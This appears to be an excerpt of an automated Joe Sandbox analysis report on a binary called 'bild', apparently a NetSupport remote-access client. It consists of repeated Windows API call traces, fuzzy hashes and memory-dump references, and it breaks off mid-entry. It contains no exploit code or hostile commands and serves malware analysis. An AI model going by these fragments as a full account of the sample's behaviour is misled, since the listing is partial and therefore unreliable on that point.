                                                                                                              • Instruction ID: 5582e5273dfdb3b1b8e11ad7f607b62a575574bd0b184718e70fa47d2f49ee87
                                                                                                              • Opcode Fuzzy Hash: 45f47fed89036b81be473805ecd1512bbaa9925ef9453195f82f36baf2d34e78
                                                                                                              • Instruction Fuzzy Hash: 8A112E72E00118AFCB00EFA9D905AFEB7B8EF49214F00456AEC05E7240E770AA148B91
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                                              • __wsplitpath.LIBCMT ref: 11111475
                                                                                                                • Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086
                                                                                                              • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                                              • String ID:
                                                                                                              • API String ID: 1847508633-0
                                                                                                              • Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                                              • Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
                                                                                                              • Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                                              • Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                                                • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                                                • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                                                • Part of subcall function 1109E910: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00B9DFC8,00B9DFC8,00B9DFC8,00B9DFC8,00B9DFC8,00B9DFC8,00B9DFC8,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                                                • Part of subcall function 1109E910: EqualSid.ADVAPI32(?,00B9DFC8,?,00000001,00000001), ref: 1109E9A3
                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 2256153495-0
                                                                                                              • Opcode ID: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                                              • Instruction ID: 36b54363b319bb335bc5da0d0e9bdd0405b18079b131e91390d3ecc07929186c
                                                                                                              • Opcode Fuzzy Hash: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                                              • Instruction Fuzzy Hash: DCF05E78A15328EFD709CFF5D88482EB7A9AF08208700447DF629D3205E631EE009F50
                                                                                                              APIs
                                                                                                              • InitializeCriticalSection.KERNEL32(111F0908,E43C2CA5,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F754
                                                                                                              • EnterCriticalSection.KERNEL32(111F0908,E43C2CA5,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F770
                                                                                                              • LeaveCriticalSection.KERNEL32(111F0908,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F7B8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                              • String ID:
                                                                                                              • API String ID: 3991485460-0
                                                                                                              • Opcode ID: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                                              • Instruction ID: 724175da6b3b5eb63f60f43096b8b9410b0df93e13cce3f4766159a849acac97
                                                                                                              • Opcode Fuzzy Hash: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                                              • Instruction Fuzzy Hash: 3D11C675A0061AAFE700CF65CD85B5BF7A9FB88714F010129E829E3340F7359808CB92
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068A12
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID: ??CTL32.DLL
                                                                                                              • API String ID: 1029625771-2984404022
                                                                                                              • Opcode ID: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                                              • Instruction ID: 38d720fc7c26638894156a2f8924bac31edb6b50614c34829f37a9a02c5b1e22
                                                                                                              • Opcode Fuzzy Hash: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                                              • Instruction Fuzzy Hash: 5831F5B2A04781DFE711CF59DC40B5AF7E8FB45724F0482AAE92897380E735A900CB92
                                                                                                              APIs
                                                                                                              • inet_ntoa.WSOCK32(00000080,?,00000000,?,6C798F91,00000000,00000000,6C7DB8DA,?,00000080), ref: 6C795852
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: inet_ntoa
                                                                                                              • String ID: gfff
                                                                                                              • API String ID: 1879540557-1553575800
                                                                                                              • Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                              • Instruction ID: 5017bed1e9d9d706f4e2806f95307584c56064e7e3034dafe3fc0b995eeb982d
                                                                                                              • Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                              • Instruction Fuzzy Hash: 1E11AB226086E78BC3028A2FB860AC6BFD9DF86241B1C4669D8C9CB701C221D80AC7D0
                                                                                                              APIs
                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 11026B6D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DriveType
                                                                                                              • String ID: ?:\
                                                                                                              • API String ID: 338552980-2533537817
                                                                                                              • Opcode ID: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                                              • Instruction ID: c0198090b602517e4922a9d0df48f1c050a77905515f879100581957a4b6d58d
                                                                                                              • Opcode Fuzzy Hash: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                                              • Instruction Fuzzy Hash: 64F09065C083DA2AEB23DE608844596BFE84B463A8F5488D9DCE887541D165E1C58791
                                                                                                              APIs
                                                                                                                • Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                                              • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                                                • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                                              Strings
                                                                                                              • Error %d Opening regkey %s, xrefs: 110ED1CA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenwvsprintf
                                                                                                              • String ID: Error %d Opening regkey %s
                                                                                                              • API String ID: 1772833024-3994271378
                                                                                                              • Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                                              • Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
                                                                                                              • Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                                              • Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0
                                                                                                              APIs
                                                                                                              • RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                                                • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                                              Strings
                                                                                                              • Error %d closing regkey %x, xrefs: 110ED17D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Closewvsprintf
                                                                                                              • String ID: Error %d closing regkey %x
                                                                                                              • API String ID: 843752472-892920262
                                                                                                              • Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                                              • Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
                                                                                                              • Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                                              • Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,0276B878,?,?,?,00000100,?,?,00000009), ref: 111463E9
                                                                                                                • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                              • String ID: NSMTRACE
                                                                                                              • API String ID: 4133054770-4175627554
                                                                                                              • Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                                              • Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
                                                                                                              • Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                                              • Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID: psapi.dll
                                                                                                              • API String ID: 1029625771-80456845
                                                                                                              • Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                                              • Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
                                                                                                              • Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                                              • Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,6C798DC8), ref: 6C794F78
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID: psapi.dll
                                                                                                              • API String ID: 1029625771-80456845
                                                                                                              • Opcode ID: bb1781f1c6e158b6f9b81986e5c298c03fcb5df880b4bd90a0e8f4cbd4f293cf
                                                                                                              • Instruction ID: 8695a5957ab992dbaaeeaaf34eef91d9fad2c9b97353cd3f8934d36f672dad7f
                                                                                                              • Opcode Fuzzy Hash: bb1781f1c6e158b6f9b81986e5c298c03fcb5df880b4bd90a0e8f4cbd4f293cf
                                                                                                              • Instruction Fuzzy Hash: 95E001B1A01B108F83B0CF3AA504646BAF0BB086507118E3E909EC3A00E330A6848F80
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102EF80,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 11014F8E
                                                                                                              Strings
